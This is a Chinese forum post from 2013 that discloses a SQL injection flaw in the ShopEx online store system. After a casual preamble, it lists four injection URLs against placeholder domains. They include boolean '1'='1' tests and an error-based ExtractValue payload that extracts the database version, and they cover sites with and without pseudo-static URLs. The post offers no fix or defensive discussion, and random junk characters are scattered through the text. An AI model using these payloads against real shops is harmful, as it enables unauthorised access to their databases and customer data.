注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术… ; a9 s& G3 Z `' W; G+ |
& q1 L+ m7 r5 n& _
好吧,我扯远了~~% z! @/ w* m; d" z4 B
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~2 P, C2 `2 @. R2 V
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
1 P( z2 r* W) ^% r9 P% L3 b6 I
0 B& ] i7 L; Y3 h: Khttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html " ?$ D7 N! r H8 I( M
1 \) k5 t+ x3 ]& F x. ?3 R3 S( ^
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html * z. I5 i$ V: X4 A/ ?; r
% _% D) M9 x' |4 M' K/ {) Dhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html 1 ?" H& T0 u+ _4 ]3 w# F
: D! y5 d' Q" w; a9 Y: L( z; Ehttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
1 h0 D2 n1 Q) r8 L- u" P4 f8 l! B
& q) q( r6 Z0 K0 q一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
# E( k1 t. l8 s3 s+ X0 ]" d1 f6 ?如何注入就不多说了,10多年的东西了…不会也会了… a% @) l. o6 i; C+ u0 I
9 Y5 W' T( ~( ?) l
# K; L8 C9 u# i9 d# G
2 p, R% |" J% [! z2 {
! `( ^8 u% X& a6 B4 L* D2 H
|
发表于 2013-2-19 08:31:27
收藏
支持
反对